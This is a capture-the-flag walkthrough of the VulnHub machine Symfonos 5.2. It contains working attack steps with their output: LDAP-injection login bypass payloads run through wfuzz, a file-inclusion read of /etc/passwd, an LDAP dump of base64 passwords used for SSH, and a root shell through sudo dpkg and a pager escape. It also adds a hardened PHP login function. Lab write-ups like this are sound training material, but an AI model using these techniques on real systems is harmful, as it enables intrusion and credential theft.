VulnHub Symfonos5.2
30 May, 2021
Machine Link: https://www.vulnhub.com/entry/symfonos-52,415/
Beginning with an nmap scan
```bash
# nmap -A -p 1-20000 192.168.56.124
Starting Nmap 7.91 ( https://nmap.org )
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.124
Host is up (0.00100s latency).
Not shown: 19996 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 16:70:13:77:22:f9:68:78:40:0d:21:76:c1:50:54:23 (RSA)
|   256 a8:06:23:d0:93:18:7d:7a:6b:05:77:8d:8b:c9:ec:02 (ECDSA)
|_  256 52:c0:83:18:f4:c7:38:65:5a:ce:97:66:f3:75:68:4c (ED25519)
80/tcp  open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
636/tcp open  ldapssl?
MAC Address: 08:00:27:5C:A1:4E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.00 ms 192.168.56.124

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.88 seconds
```
Found a few files using gobuster
```bash
$ ./gobuster dir -r -u http://192.168.56.124 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.124
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/home.php             (Status: 200) [Size: 1650]
/admin.php            (Status: 200) [Size: 1650]
/static               (Status: 200) [Size: 1745]
/logout.php           (Status: 200) [Size: 1650]
/portraits.php        (Status: 200) [Size: 165]
/server-status        (Status: 403) [Size: 279]
===============================================================
Finished
===============================================================
```
`home.php` always redirected to `admin.php`, and `portraits.php` was a directory listing of images. On `admin.php` I tried a number of SQL injection payloads, but none of them worked. After a lot of searching and reading I came across LDAP injection. An application is vulnerable to LDAP injection when it builds an LDAP search filter from unsanitized user input (here the username and password) and runs that filter against the directory. Using [this](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_FUZZ.txt) list of payloads with `wfuzz`, I was able to bypass the login.
```bash
# wfuzz -c -w LDAP_FUZZ.txt -H 'Cookie: PHPSESSID=8haqh8cjbvemia7lm7roe7r6kh' "http://192.168.56.124/admin.php?username=FUZZ&password=admin"
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.124/admin.php?username=FUZZ&password=admin
Total requests: 46
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000031: 200 39 L 80 W 1663 Ch ")"
000000015: 200 39 L 80 W 1663 Ch "|"
000000030: 200 39 L 80 W 1663 Ch "("
000000033: 200 39 L 80 W 1663 Ch "*(|(mail=*))"
000000026: 200 39 L 80 W 1663 Ch "%2A%28%7C%28objectclass%3D%2A%29%29"
000000027: 200 39 L 80 W 1663 Ch "%2A%7C"
000000007: 200 39 L 80 W 1663 Ch "*(|(objectclass=*))"
000000001: 200 39 L 80 W 1663 Ch "*"
000000025:   302        0 L      0 W        0 Ch        "%2A%28%7C%28mail%3D%2A%29%29"
...
```
The one payload that came back as a 302 instead of the login page is the bypass. Once logged in, the link to the portraits page is `home.php?url=http://127.0.0.1/portraits.php`, which suggests that `home.php` fetches and includes whatever the `url` parameter points to, i.e. that the site is vulnerable to remote file inclusion. A local path works just as well:

```bash
# curl 'http://192.168.56.124/home.php?url=/etc/passwd' -H 'Cookie: PHPSESSID=8haqh8cjbvemia7lm7roe7r6kh'
<html>
<head>
<link rel="stylesheet" type="text/css" href="/static/bootstrap.min.css">
</head>
<body>
<nav class="navbar navbar-expand-lg navbar-dark bg-dark">
<a class="navbar-brand" href="home.php">symfonos</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarColor02" aria-controls="navbarColor02" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarColor02">
<ul class="navbar-nav mr-auto">
<li class="nav-item">
<a class="nav-link" href="home.php">Home</a>
</li>
<li class="nav-item">
<a class="nav-link" href="home.php?url=http://127.0.0.1/portraits.php">Portraits</a>
</li>
<li class="nav-item">
<a class="nav-link" href="logout.php">Logout</a>
</li>
</ul>
</div>
</nav><br />
<center>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
</center>
</body>
```
Reading the source of `admin.php` turned up hard-coded LDAP bind credentials. It also shows the injection point: `$username` and `$password` are interpolated straight into the search filter.
```php
function authLdap($username, $password) {
    $ldap_ch = ldap_connect("ldap://172.18.0.22");
    ldap_set_option($ldap_ch, LDAP_OPT_PROTOCOL_VERSION, 3);
    if (!$ldap_ch) {
        return FALSE;
    }
    // Hard-coded service-account credentials
    $bind = ldap_bind($ldap_ch, "cn=admin,dc=symfonos,dc=local", "qMDdyZh3cT6eeAWD");
    if (!$bind) {
        return FALSE;
    }
    // User input goes into the filter unescaped: this is the LDAP injection
    $filter = "(&(uid=$username)(userPassword=$password))";
    $result = ldap_search($ldap_ch, "dc=symfonos,dc=local", $filter);
    if (!$result) {
        return FALSE;
    }
    $info = ldap_get_entries($ldap_ch, $result);
    if (!($info) || ($info["count"] == 0)) {
        return FALSE;
    }
    return TRUE;
}
```
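A hardened replacement for `authLdap()`, added here as an example; it is not code from the machine or from the original writeup. It assumes the same directory host and base DN as above, reads the service-account password from an assumed `LDAP_ADMIN_PW` environment variable instead of hard-coding it, escapes the username with `ldap_escape()` before it enters the filter, and checks the password by binding as the user rather than comparing `userPassword` inside a filter.

```php
<?php
// Hardened login check for admin.php (added example, not the machine's code).
// Assumptions: same LDAP host and base DN as the original; the service-account
// password is provided through the LDAP_ADMIN_PW environment variable.
function authLdapSafe(string $username, string $password): bool
{
    // An empty password would turn the user bind below into an anonymous
    // (unauthenticated) simple bind, which some servers report as success.
    if ($username === '' || $password === '') {
        return false;
    }

    $ldap_ch = ldap_connect("ldap://172.18.0.22");
    if (!$ldap_ch) {
        return false;
    }
    ldap_set_option($ldap_ch, LDAP_OPT_PROTOCOL_VERSION, 3);

    // The service account is used only to look up the user's DN.
    $adminPw = getenv('LDAP_ADMIN_PW');
    if ($adminPw === false
        || !@ldap_bind($ldap_ch, "cn=admin,dc=symfonos,dc=local", $adminPw)) {
        return false;
    }

    // RFC 4515 escaping: '*', '(', ')', '\' and NUL become \2a \28 \29 \5c \00,
    // so a username such as "*(|(objectclass=*))" stays a literal value and
    // can no longer change the structure of the filter.
    $uid    = ldap_escape($username, '', LDAP_ESCAPE_FILTER);
    $result = ldap_search($ldap_ch, "dc=symfonos,dc=local", "(uid=$uid)", ['dn']);
    if (!$result) {
        return false;
    }
    $entries = ldap_get_entries($ldap_ch, $result);
    if (!$entries || $entries["count"] !== 1) {
        return false; // unknown user, or an ambiguous match
    }
    $userDn = $entries[0]["dn"];

    // Let the directory verify the password by binding as the user. The web
    // application then only needs permission to search uid and dn, not to
    // read userPassword.
    $ok = @ldap_bind($ldap_ch, $userDn, $password);
    ldap_unbind($ldap_ch);
    return $ok === true;
}
```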
Using `ldapsearch` with these credentials returned the whole directory, including the `userPassword` attributes:
```bash
# ldapsearch -x -h 192.168.56.124 -D 'cn=admin,dc=symfonos,dc=local' -w 'qMDdyZh3cT6eeAWD' -b "dc=symfonos,dc=local"
# extended LDIF
#
# LDAPv3
# base <dc=symfonos,dc=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# symfonos.local
dn: dc=symfonos,dc=local
objectClass: top
objectClass: dcObject
objectClass: organization
o: symfonos
dc: symfonos

# admin, symfonos.local
dn: cn=admin,dc=symfonos,dc=local
objectClass: simpleSecurityObject
objectClass: organizationalRole
cn: admin
description: LDAP administrator
userPassword:: e1NTSEF9VVdZeHZ1aEEwYldzamZyMmJodHhRYmFwcjllU2dLVm0=

# zeus, symfonos.local
dn: uid=zeus,dc=symfonos,dc=local
uid: zeus
cn: zeus
sn: 3
objectClass: top
objectClass: posixAccount
objectClass: inetOrgPerson
loginShell: /bin/bash
homeDirectory: /home/zeus
uidNumber: 14583102
gidNumber: 14564100
userPassword:: Y2V0a0tmNHdDdUhDOUZFVA==
mail: zeus@symfonos.local
gecos: Zeus User

# search result
search: 2
result: 0 Success

# numResponses: 4
# numEntries: 3
```
The double colon in the LDIF means the value is base64-encoded. The admin's password decodes to an SSHA hash, but zeus' decodes to a plaintext password, which let me SSH in:
```bash
# Administrator's password
# echo "e1NTSEF9VVdZeHZ1aEEwYldzamZyMmJodHhRYmFwcjllU2dLVm0=" | base64 --decode
{SSHA}UWYxvuhA0bWsjfr2bhtxQbapr9eSgKVm
# zeus' password
# echo "Y2V0a0tmNHdDdUhDOUZFVA==" | base64 --decode
cetkKf4wCuHC9FET
# ssh zeus@192.168.56.124
The authenticity of host '192.168.56.124 (192.168.56.124)' can't be established.
ECDSA key fingerprint is SHA256:0LrOVGfXWfj1Vtdo1krp85ZDlnsb3DDJFap9cOF5WoA.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.124' (ECDSA) to the list of known hosts.
zeus@192.168.56.124's password:
Linux symfonos5 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Feb 5 06:14:43 2020 from 172.16.1.1
zeus@symfonos5:~$
```
zeus is allowed to run `dpkg` as root through sudo, without a password:
```bash
zeus@symfonos5:~$ sudo -l
Matching Defaults entries for zeus on symfonos5:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User zeus may run the following commands on symfonos5:
    (root) NOPASSWD: /usr/bin/dpkg
```
GTFO!! https://gtfobins.github.io/gtfobins/dpkg/ has an entry for it: `dpkg -l` shows its output through a pager, and typing `!/bin/bash` at the pager prompt spawns a shell with the pager's privileges, here root.
```bash
zeus@symfonos5:~$ sudo dpkg -l
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name                          Version                     Architecture Description
+++-=============================-===========================-============-===============================================================================
ii  adduser                       3.118                       all          add and remove users and groups
ii  ame                           1.0                         amd64        no description given
ii  apparmor                      2.13.2-10                   amd64        user-space parser utility for AppArmor
ii  apt                           1.8.2                       amd64        commandline package manager
ii  apt-listchanges               3.19                        all          package change history notification tool
ii  apt-transport-https           1.8.2                       all          transitional package for https support
ii  apt-utils                     1.8.2                       amd64        package management related utility programs
ii  aufs-dkms                     4.19+20190211-1             all          DKMS files to build and install aufs
ii  aufs-tools                    1:4.14+20190211-1           amd64        Tools to manage aufs filesystems
ii  base-files                    10.3+deb10u2                amd64        Debian base system miscellaneous files
ii  base-passwd                   3.5.46                      amd64        Debian base system master password and group files
ii  bash                          5.0-4                       amd64        GNU Bourne Again SHell
ii  bash-completion               1:2.8-6                     all          programmable completion for the bash shell
ii  bind9-host                    1:9.11.5.P4+dfsg-5.1        amd64        DNS lookup utility (deprecated)
ii  binutils                      2.31.1-16                   amd64        GNU assembler, linker and binary utilities
ii  binutils-common:amd64         2.31.1-16                   amd64        Common files for the GNU assembler, linker and binary utilities
ii  binutils-x86-64-linux-gnu     2.31.1-16                   amd64        GNU binary utilities, for x86-64-linux-gnu target
ii  bsdmainutils                  11.1.2+b1                   amd64        collection of more utilities from FreeBSD
ii  bsdutils                      1:2.33.1-0.1                amd64        basic utilities from 4.4BSD-Lite
ii  build-essential               12.6                        amd64        Informational list of build-essential packages
ii  busybox                       1:1.30.1-4                  amd64        Tiny utilities for small and embedded systems
ii  bzip2                         1.0.6-9.2~deb10u1           amd64        high-quality block-sorting file compressor - utilities
ii  ca-certificates               20190110                    all          Common CA certificates
ii  cgroupfs-mount                1.4                         all          Light-weight package to set up cgroupfs mounts
ii  console-setup                 1.193~deb10u1               all          console font and keymap setup program
ii  console-setup-linux           1.193~deb10u1               all          Linux specific part of console-setup
ii  containerd.io                 1.2.10-3                    amd64        An open and reliable container runtime
ii  coreutils                     8.30-3                      amd64        GNU core utilities
ii  cpio                          2.12+dfsg-9                 amd64        GNU cpio -- a program to manage archives of files
ii  cpp                           4:8.3.0-1                   amd64        GNU C preprocessor (cpp)
ii  cpp-8                         8.3.0-6                     amd64        GNU C preprocessor
ii  cron                          3.0pl1-134+deb10u1          amd64        process scheduling daemon
ii  curl                          7.64.0-4                    amd64        command line tool for transferring data with URL syntax
ii  dash                          0.5.10.2-5                  amd64        POSIX-compliant shell
ii  dbus                          1.12.16-1                   amd64        simple interprocess messaging system (daemon and utilities)
ii  debconf                       1.5.71                      all          Debian configuration management system
ii  debconf-i18n                  1.5.71                      all          full internationalization support for debconf
ii  debian-archive-keyring        2019.1                      all          GnuPG archive keys of the Debian archive
ii  debian-faq                    9.0                         all          Debian Frequently Asked Questions
ii  debianutils                   4.8.6.1                     amd64        Miscellaneous utilities specific to Debian
ii  dictionaries-common           1.28.1                      all          spelling dictionaries - common utilities
ii  diffutils                     1:3.7-3                     amd64        File comparison utilities
ii  dirmngr                       2.2.12-1+deb10u1            amd64        GNU privacy guard - network certificate management service
ii  discover                      2.1.2-8                     amd64        hardware identification system
ii  discover-data                 2.2013.01.11                all          Data lists for Discover hardware detection system
ii  distro-info-data              0.41+deb10u1                all          information about the distributions' releases (data files)
ii  dkms                          2.6.1-4                     all          Dynamic Kernel Module Support Framework
ii  dmidecode                     3.2-1                       amd64        SMBIOS/DMI table decoder
!/bin/bash
root@symfonos5:/home/zeus# id
uid=0(root) gid=0(root) groups=0(root)
root@symfonos5:/home/zeus# cd /root
root@symfonos5:~# ls
proof.txt
root@symfonos5:~# cat proof.txt
Congrats on rooting symfonos:5!

ZEUS
* . dZZZZZ, . *
dZZZZ ZZ,
* . ,AZZZZZZZZZZZ `ZZ,_ *
,ZZZZZZV' ZZZZ `Z,`\
,ZZZ ZZ . ZZZZ `V
* ZZZZV' ZZ ZZZZ \_ .
. V l . ZZ ZZZZZZ .
l \ ZZ, ZZZ ZZZZZZ,
. / ZZ l ZZZ ZZZ `Z,
ZZ l ZZZ Z Z, `Z, *
. ZZ ZZZ Z Z, `l
Z ZZ V `Z \
V ZZC l V
Z l V ZR l .
\ \ l ZA
\ C C
\ K / / K
A \ \ | / / /
\ \\|/ / /
__________________________________\|/_________________________

Contact me via Twitter @zayotic to give feedback!
```